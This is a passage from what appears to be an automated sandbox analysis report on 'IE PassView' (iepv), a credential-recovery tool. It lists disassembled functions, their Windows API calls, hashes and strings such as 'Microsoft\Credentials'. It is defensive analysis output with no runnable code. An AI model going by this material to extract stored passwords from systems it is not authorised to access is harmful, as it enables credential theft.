                                        • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                        • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                        • String ID: MS Sans Serif
                                        • API String ID: 3492281209-168460110
                                        • Opcode ID: de1f4aa0b43da6159be95dbce1760fa1eb4319b3e27b373a6c962ee0d067ba13
                                        • Instruction ID: fff5adc68d9bba56841c83886f3a61a5973af893ea5221fedb052cbc4926c7a1
                                        • Opcode Fuzzy Hash: de1f4aa0b43da6159be95dbce1760fa1eb4319b3e27b373a6c962ee0d067ba13
                                        • Instruction Fuzzy Hash: 82F0A775A40304B7E72267A1DD4BF4A7BACAB40B00F108535F661B91F2D6F46514CB59
                                        Function 0040593C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ClassName_strcmpimemset
                                        • String ID: edit
                                        • API String ID: 275601554-2167791130
                                        • Opcode ID: e407a713191406d9c0c3c55480dd094b490590bba3a80008235b6a85753bc709
                                        • Instruction ID: 222c5e45a5ad01b59d3a404b3fc84ac9812acc6f498e24d232171e3b7a5840fc
                                        • Opcode Fuzzy Hash: e407a713191406d9c0c3c55480dd094b490590bba3a80008235b6a85753bc709
                                        • Instruction Fuzzy Hash: 10E09BB3C4412E6ADB25A6A4DC01FE5376CDF14305F0401B6F949F10C1E5B4A6884795
                                        Function 00405CE2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: strlen$_mbscat
                                        • String ID: Microsoft\Credentials
                                        • API String ID: 3951308622-3148402405
                                        • Opcode ID: 89e218f53934e3a49db4fc65d04970d3dbd2527a65af051a0b9feb1739d9749b
                                        • Instruction ID: 05e85e3a1237bcdb536053856754acaa178e34bce0c20ab88a5daf693b674428
                                        • Opcode Fuzzy Hash: 89e218f53934e3a49db4fc65d04970d3dbd2527a65af051a0b9feb1739d9749b
                                        • Instruction Fuzzy Hash: A8D09EB3D0952016E61531677C8A95B8ADCC9E277C325157FF404B71C1E87D988641BD
                                        Function 0040CEC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(shell32.dll,0040CF03), ref: 0040CED3
                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040CEE8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: SHGetSpecialFolderPathA$shell32.dll
                                        • API String ID: 2574300362-543337301
                                        • Opcode ID: e48987c715c5e532cf4409d5839baa7e7cfb35eb4a8deaba8e93e326759bab4d
                                        • Instruction ID: e58cfcfb905dacea4eb30ad829829929964992e20368f8c1a33815eb627db913
                                        • Opcode Fuzzy Hash: e48987c715c5e532cf4409d5839baa7e7cfb35eb4a8deaba8e93e326759bab4d
                                        • Instruction Fuzzy Hash: 12D092746402429BD7209F22EE497423AA4A700701F1085BAA044F16A0DAB8906A9F5C
                                        Function 0040354C Relevance: 6.3, APIs: 5, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00403391: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,0040382E,?,00403D84,?,?,?,?,?,?,?,?), ref: 004033A1
                                        • memset.MSVCRT ref: 00403581
                                        • memset.MSVCRT ref: 00403595
                                        • memset.MSVCRT ref: 004035A9
                                        • memcpy.MSVCRT(?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,00000000), ref: 004035B9
                                        • memcpy.MSVCRT(?,?,00000014,?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 004035C9
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$memcpy$AcquireContextCrypt
                                        • String ID:
                                        • API String ID: 208668350-0
                                        • Opcode ID: 64eca37d22c3f95fb91b8198635d72de67174192487b0545c08c119533ec8301
                                        • Instruction ID: 4b6ae2541e05763db9ab669e9c4983ddea4fea9d27cd128077aeab09cafa718f
                                        • Opcode Fuzzy Hash: 64eca37d22c3f95fb91b8198635d72de67174192487b0545c08c119533ec8301
                                        • Instruction Fuzzy Hash: 3921307180011EBEDB11EE69CC85FEF7BACEF15345F0040BAB918E6052D7389B488B65
                                        Function 00409D09 Relevance: 6.1, APIs: 4, Instructions: 112stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004085DD: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004085FF
                                          • Part of subcall function 004085DD: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00408694
                                        • strlen.MSVCRT ref: 00409D2F
                                        • atoi.MSVCRT(?), ref: 00409D3D
                                        • _mbsicmp.MSVCRT ref: 00409D90
                                        • _mbsicmp.MSVCRT ref: 00409DA3
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _mbsicmp$??2@??3@atoistrlen
                                        • String ID:
                                        • API String ID: 4107816708-0
                                        • Opcode ID: 9d3511cc85c0046a82ba62c2ff37d56c4493560d2b22a3d66afa5ac120808968
                                        • Instruction ID: 6ed8edb2de1c4c6dca683edd5c99256fa7e153bea9141607462d192657b5517c
                                        • Opcode Fuzzy Hash: 9d3511cc85c0046a82ba62c2ff37d56c4493560d2b22a3d66afa5ac120808968
                                        • Instruction Fuzzy Hash: 3A412934904704AFDB20DF69D980A9AB7F4FF48318F10486EE855E7392D778AA918B54
                                        Function 00401FF0 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                        Download Yara Rule
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402028
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040203B
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040204E
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402061
                                          • Part of subcall function 00401D25: _mbscmp.MSVCRT ref: 00401D35
                                          • Part of subcall function 00408B6F: free.MSVCRT ref: 00408BBA
                                          • Part of subcall function 00408B6F: memcpy.MSVCRT(00000000,?,?,?,?,?,00401FE9,?), ref: 00408BFB
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_mbscmpfreememcpy
                                        • String ID:
                                        • API String ID: 3415728570-0
                                        • Opcode ID: 2fec005c3c64d1cb68eec752d5c08818aecff286011e2fbf3e21b6ff9f748ece
                                        • Instruction ID: 2ce28415f2b397eb987a407592397fee7a87833c22dd51c9f6902c33bbeb4a34
                                        • Opcode Fuzzy Hash: 2fec005c3c64d1cb68eec752d5c08818aecff286011e2fbf3e21b6ff9f748ece
                                        • Instruction Fuzzy Hash: 95214FF280412DBFDB21DF549C80EEB7B7DEF05368F000295BD29B7191C675AE508AA4
                                        Function 004020B5 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 004020F3
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402109
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040211F
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00402134
                                          • Part of subcall function 00401D25: _mbscmp.MSVCRT ref: 00401D35
                                          • Part of subcall function 00408B6F: free.MSVCRT ref: 00408BBA
                                          • Part of subcall function 00408B6F: memcpy.MSVCRT(00000000,?,?,?,?,?,00401FE9,?), ref: 00408BFB
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_mbscmpfreememcpy
                                        • String ID:
                                        • API String ID: 3415728570-0
                                        • Opcode ID: 96913ee3da2a935c70f070d31cd78ffe5420479fedd4a40e0b9776260d59d1ca
                                        • Instruction ID: a7e934fef92a8b71a5dd741b586f5c4ad70d0c4e074fa76087a728474342fa1d
                                        • Opcode Fuzzy Hash: 96913ee3da2a935c70f070d31cd78ffe5420479fedd4a40e0b9776260d59d1ca
                                        • Instruction Fuzzy Hash: 232130F690411C7FDB10DB69DC80EDB7BBCEB08268F100265B518E7291D630AE50CB64
                                        Function 004064A5 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401406,?,?,?,?,0040F4E8,0000000C), ref: 004064DA
                                        • memset.MSVCRT ref: 004064EB
                                        • memcpy.MSVCRT(004119A8,?,00000000,00000000,00000000,00000000,00000000,?,?,00401406,?,?,?,?,0040F4E8,0000000C), ref: 004064F7
                                        • ??3@YAXPAX@Z.MSVCRT ref: 00406504
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@??3@memcpymemset
                                        • String ID:
                                        • API String ID: 1865533344-0
                                        • Opcode ID: 8b4c96493cd9508214da094db5bd26336ef1a00b36f1105ef158eccb79de414b
                                        • Instruction ID: 7332fcc42ad715dc2c562c01f7626adb8d30454791f2fe56a92ceb7b724ebb25
                                        • Opcode Fuzzy Hash: 8b4c96493cd9508214da094db5bd26336ef1a00b36f1105ef158eccb79de414b
                                        • Instruction Fuzzy Hash: 7A116A71604601AFD328DF2DD881A27F7E5EFD8304B21892EE4DA97385DA35E801CB54
                                        Function 0040D00D Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHGetMalloc.SHELL32(?), ref: 0040D01D
                                        • SHBrowseForFolder.SHELL32(?), ref: 0040D04F
                                        • SHGetPathFromIDList.SHELL32(00000000,?), ref: 0040D063
                                        • _mbscpy.MSVCRT(?,?), ref: 0040D076
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: BrowseFolderFromListMallocPath_mbscpy
                                        • String ID:
                                        • API String ID: 1479990042-0
                                        • Opcode ID: 7e1135835be0e94a21e27305da28ced4eb24b2eb92fad6c8c205bd6e3a39184f
                                        • Instruction ID: 80035aed7d598b413f2d673abd293d15a4d0abcd53c7511a52d4806839a3ef89
                                        • Opcode Fuzzy Hash: 7e1135835be0e94a21e27305da28ced4eb24b2eb92fad6c8c205bd6e3a39184f
                                        • Instruction Fuzzy Hash: 8E11E8B6900209EFDB00DFA9D9889AEBBF8EB49314F10446AE905E7340D735DA05CB65
                                        Function 0040A0CE Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040755F
                                          • Part of subcall function 00407520: LoadStringA.USER32(00000000,00000006,?,?), ref: 004075F4
                                          • Part of subcall function 00407520: memcpy.MSVCRT(00000000,00000001), ref: 00407633
                                        • sprintf.MSVCRT ref: 0040A0F4
                                        • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040A157
                                          • Part of subcall function 00407520: _mbscpy.MSVCRT(004121F8,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040759D
                                          • Part of subcall function 00407520: strlen.MSVCRT ref: 004075BB
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 004075C9
                                        • sprintf.MSVCRT ref: 0040A11E
                                        • _mbscat.MSVCRT ref: 0040A131
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: HandleModulesprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                        • String ID:
                                        • API String ID: 2015865870-0
                                        • Opcode ID: 3bacfee5431946e8146b112680c25f6a95579dcafd16ce18d83a6503912c57d7
                                        • Instruction ID: d1cf58fa5dca294d86c7843aa5e5c981824fabe329cc1801f98fe3932a2be64a
                                        • Opcode Fuzzy Hash: 3bacfee5431946e8146b112680c25f6a95579dcafd16ce18d83a6503912c57d7
                                        • Instruction Fuzzy Hash: C60162B29003046BD721B7B5DD87FEB73ACAB04304F04047FB659B61C2DAB8A6444A6A
                                        Function 004094FD Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00409520
                                        • memset.MSVCRT ref: 00409536
                                          • Part of subcall function 00408C16: _mbscpy.MSVCRT(00000000,?,004091E1,?,?,?), ref: 00408C1B
                                          • Part of subcall function 00408C16: _strlwr.MSVCRT ref: 00408C5E
                                        • sprintf.MSVCRT ref: 00409560
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                        • String ID: </%s>
                                        • API String ID: 3699762281-259020660
                                        • Opcode ID: adeeb32083e44ae32bc83bbdb127d7a2a94eeea44e07c9e4799656e228e23114
                                        • Instruction ID: bc821998500ed00f0206f46da861f93d09f5f4896164571df8cee20e405d8a8e
                                        • Opcode Fuzzy Hash: adeeb32083e44ae32bc83bbdb127d7a2a94eeea44e07c9e4799656e228e23114
                                        • Instruction Fuzzy Hash: B10186B290012967DB21A659CC45FDE766C9F55314F0400FAB509F31C2DA749A448BA5
                                        Function 0040C82D Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040593C: memset.MSVCRT ref: 0040595C
                                          • Part of subcall function 0040593C: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040596F
                                          • Part of subcall function 0040593C: _strcmpi.MSVCRT ref: 00405981
                                        • SetBkMode.GDI32(?,00000001), ref: 0040C854
                                        • SetBkColor.GDI32(?,00FFFFFF), ref: 0040C862
                                        • SetTextColor.GDI32(?,00C00000), ref: 0040C870
                                        • GetStockObject.GDI32(00000000), ref: 0040C878
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Color$ClassModeNameObjectStockText_strcmpimemset
                                        • String ID:
                                        • API String ID: 2652942504-0
                                        • Opcode ID: 2250eef6674719bdd7f4dae543dfd5788a0825d0b71622ca88b619b7a1fa905d
                                        • Instruction ID: ffc7004a7d371072b1ff32533f2df7bb14694207d9c7f55142dd8fda8b3e0bcd
                                        • Opcode Fuzzy Hash: 2250eef6674719bdd7f4dae543dfd5788a0825d0b71622ca88b619b7a1fa905d
                                        • Instruction Fuzzy Hash: 4BF08C32100208FBDF152F65EE4AE9E3B21EF04322F108236FA15B41F0CBB58820AA59
                                        Function 0040BEE2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • memcpy.MSVCRT(00411DA8,?,00000050,?,0040144A,?), ref: 0040BEFC
                                        • memcpy.MSVCRT(00411AD8,?,000002CC,00411DA8,?,00000050,?,0040144A,?), ref: 0040BF0E
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040BF21
                                        • DialogBoxParamA.USER32(00000000,0000006B,?,Function_0000BBF4,00000000), ref: 0040BF35
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memcpy$DialogHandleModuleParam
                                        • String ID:
                                        • API String ID: 1386444988-0
                                        • Opcode ID: 2ace08b6cf9804c4be4aa9429945c127ba00e1c21a3ae0b7d8b7e958248f7000
                                        • Instruction ID: af6fc003c7e3f1047039bfe483d3735f66c7a1dd44f577401d39675ba837eeca
                                        • Opcode Fuzzy Hash: 2ace08b6cf9804c4be4aa9429945c127ba00e1c21a3ae0b7d8b7e958248f7000
                                        • Instruction Fuzzy Hash: 15F08271A807106BD7606BA6FD0AF963AA0EB40B16F14443AF744F51E0C3B554248FDE
                                        Function 0040D7EB Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
